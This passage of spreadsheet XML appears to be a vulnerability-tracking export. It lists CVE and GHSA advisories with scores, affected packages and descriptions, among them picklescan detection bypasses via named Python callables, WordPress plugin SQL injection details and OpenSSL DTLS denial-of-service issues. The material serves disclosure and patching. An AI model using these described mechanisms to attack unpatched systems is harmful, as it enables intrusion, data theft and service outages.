      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack Keystone before 29.0.3. Tokens obtained via delegated authentication methods (EC2 credentials, application credentials, OAuth1 access tokens, and trusts) are not blocked from creating, modifying, or deleting credentials via the /v3/credentials API. EC2-derived tokens can additionally read credential blobs, exposing TOTP MFA seeds and other secrets. Also, PATCH /v3/credentials does not validate the requested post-update project_id, allowing any delegated token to move a credential to an unauthorized project. All Keystone deployments using delegated authentication are affected.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90460</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M452" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr"/>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j343-8v2j-ff7w. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect malicious pickle files using idlelib.pyshell.ModifiedInterpreter.runcommand in reduce methods. Attackers can embed undetected code in pickle files that executes remote commands when loaded by victims.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-8mc5-7w9m-fqv6</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M453" s="5" t="inlineStr">
        <is>
          <t>0.0.30</t>
        </is>
      </c>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr"/>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9w88-8rmg-7g2p. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fcqg-3mwf-cfcf</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M454" s="5" t="inlineStr">
        <is>
          <t>0.0.25</t>
        </is>
      </c>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr"/>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-v7x6-rv5q-mhwc. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit() in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute when pickle.load() is called.</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-fh2f-24rh-r2vq</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M455" s="5" t="inlineStr">
        <is>
          <t>0.0.28</t>
        </is>
      </c>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr"/>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-vv6j-3g6g-2pvj. This link is maintained to preserve external references.
### Original Description
picklescan before 0.0.28 fails to detect malicious pickle files that invoke torch.utils._config_module.load_config function within reduce methods. Attackers can craft pickle files embedding arbitrary code that evades detection but executes during pickle.load, enabling remote code execution in supply chain attacks.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-qvp4-q2p5-22gg</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14457</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>Issue summary: In a server or client configuration with RFC7250 Raw Public Keys (RPKs)
enabled, and only the private key (with no associated certificate) configured locally,
a NULL pointer dereference may occur when the remote peer solicits raw public keys and
also sends the typically omitted "signature_algorithms_cert" TLS extension.
Impact summary: The impact is limited to a possible Denial of Service as a result of
an application abort, no data disclosure or remote command execution are possible.
CWE: CWE-476: NULL Pointer Dereference
Description: While a passing comment in sample code in the documentation suggests
that key-only RPK configurations are supported, the best-practice RPK configuration
is to always configure a corresponding certificate (possibly self-signed or
signed by any convenient CA).
When the private key is configured along with a matching certificate, the
"signature_algorithms_cert" extension is handled reliably even without the
fix, and peer clients or servers that don't support raw public keys may be
able to complete a TLS connection by pinning or verifying the corresponding
certificate or its public key.
Deployments that prefer to configure just a private key with no certificate
need to upgrade to an updated release as noted below.
FIPS impact: no
No FIPS modules are affected by this issue, as the SSL protocol implementation
is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14457</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.1.22 via the 'event_layout' parameter parameter. This makes it possible for authenticated attackers, with custom-level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S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15462</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>The Sticky Chat Widget plugin for WordPress is vulnerable to SQL Injection via the 'scw_form_fields' parameter array keys of the 'scw_save_form_data' AJAX action in versions up to, and including, 1.4.2. This is due to the save_form_data() function passing attacker-controlled POST array keys unsanitized to $wpdb-&gt;insert(), which wraps column identifiers in backticks without escaping them, allowing a backtick in an attacker-supplied key to break out of the column-identifier list into raw SQL; additionally, the use of filter_input() bypasses WordPress's wp_magic_quotes() protection, and the widget_id validation loop is skipped entirely when no valid widget_id is supplied, leaving $isValid at 1. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15462</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18561</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>The Unlimited Elements For Elementor plugin for WordPress is vulnerable to SQL Injection via the 'addontype' parameter in versions up to, and including, 2.0.16. This is due to insufficient escaping on the user-supplied parameter and the lack of sufficient preparation on the existing SQL query in the getWhereString() function; when the parameter is supplied as an array, element zero is used verbatim as the SQL comparison operator and concatenated into the WHERE clause without sanitization, while normalizeAjaxInputData() strips WordPress's magic_quotes protection from the value. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18561</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44914</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-web-api</t>
        </is>
      </c>
      <c r="M460" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr"/>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>Apache NiFi 1.12.0 through 2.9.0 are missing authorization when replacing Process Groups that include extension components with specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required, but framework authorization did not check restricted status when handling requests to replace Process Groups. The missing authorization permits a user with general write access to add components with Restricted status. Apache NiFi installations that do not implement specific authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.9.0 is the recommended mitigation, which removes the implementation of Restricted status authorization from the framework.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44914</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49846</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-697</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>libks provides foundational support for signalwire C products. Prior to version 2.0.11, `clean_uri()` in libks's HTTP request parser fails to reject URIs whose path has more segments than its internal canonicalization buffer can hold. The canonicalization step silently passes such URIs through with embedded ".." sequences intact, enabling path traversal in any consumer that later joins the URI with a filesystem path. Version 2.0.11 patches the issue.</t>
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49846</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50013</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-820</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>Hoverfly is an open source API simulation tool. Prior to version 1.12.8, when Hoverfly is running in Diff mode, the `AddDiff()` function writes to the shared `responsesDiff` map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a `fatal error: concurrent map read and map write`, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests. Version 1.12.8 patches the issue.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50013</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54135</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>AirSane is a SANE frontend, and a scanner server that supports Apple's AirScan protocol. Versions prior to 0.4.12 have a vulnerability in the custom HTTP server implementation of AirSane that allows a remote unauthenticated attacker to cause a Denial of Service (DoS) via memory exhaustion (OOM). In httpserver.cpp, the HttpServer::Request::content function reads the Content-Length header and directly passes this value to std::string::resize() without any upper-bound validation or safe parsing. An attacker can send an HTTP POST request with an artificially large Content-Length value. This forces the daemon to attempt allocating gigabytes of memory, resulting in a std::bad_alloc exception and immediately crashing the AirSane process. Additionally, providing non-numeric characters in the Content-Length header leads to undefined behavior (NaN to integer conversion) due to the lack of error handling during header parsing. Version 0.4.12 patches the issue.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54135</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54874</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>Issue summary: Receiving a DTLS record for a future epoch while a handshake
is in progress causes OpenSSL to buffer far more memory than the record
itself requires.
Impact summary: A peer can use a small amount of network traffic to make an
OpenSSL DTLS endpoint retain a disproportionately large amount of memory,
which may lead to a Denial of Service.
CWE: CWE-405: Asymmetric Resource Consumption (Amplification)
Description: While a DTLS handshake is in progress, a peer may legitimately
have already moved on to the next epoch (for example, having sent its
ChangeCipherSpec and Finished messages) before the local endpoint has
processed the same transition, typically because of reordering on the
underlying UDP transport. OpenSSL buffers such early records so that they
can be processed once the local endpoint catches up.
Buffering a record currently retains the entire read buffer it arrived in,
which is sized to hold the largest possible DTLS record (around 16
kilobytes), rather than just the bytes that make up the record itself. Up
to 100 such records may be buffered per connection. As a result, a peer
that sends a stream of small forged records claiming to belong to the next
epoch can cause an OpenSSL DTLS endpoint to retain around 1.7 megabytes of
memory, despite sending only a small fraction of that amount of data over
the network.
An attacker therefore gains a memory amplification factor of around 1200,
and can multiply the effect across as many associations as it is able to
open, making this a remote memory exhaustion Denial of Service risk for
DTLS servers. Since the memory retained per connection remains bounded,
and any limit an application already places on the number of concurrent
associations also bounds the total exposure, this issue has been assessed
as Low severity.
FIPS impact: no
No FIPS modules are affected by this issue as the affected code is outside
the OpenSSL FIPS module boundary.
OpenSSL 4.0, 3.6, 3.5, 3.4, 3.0, 1.1.1 and 1.0.2 are vulnerable to this
issue.
OpenSSL 4.0 users should upgrade to OpenSSL 4.0.2.
OpenSSL 3.6 users should upgrade to OpenSSL 3.6.4.
OpenSSL 3.5 users should upgrade to OpenSSL 3.5.8.
OpenSSL 3.4 users should upgrade to OpenSSL 3.4.7.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.22.
Premium support customers only:
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1zi
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zr
This issue was reported on 18 May 2026 by Amazon Web Services.
The fix has been developed by Matt Caswell.
-- cut (non-publishing metadata for internal use) --
Reported by: Amazon Web Services
Fixed by: Matt Caswell</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54874</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57159</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
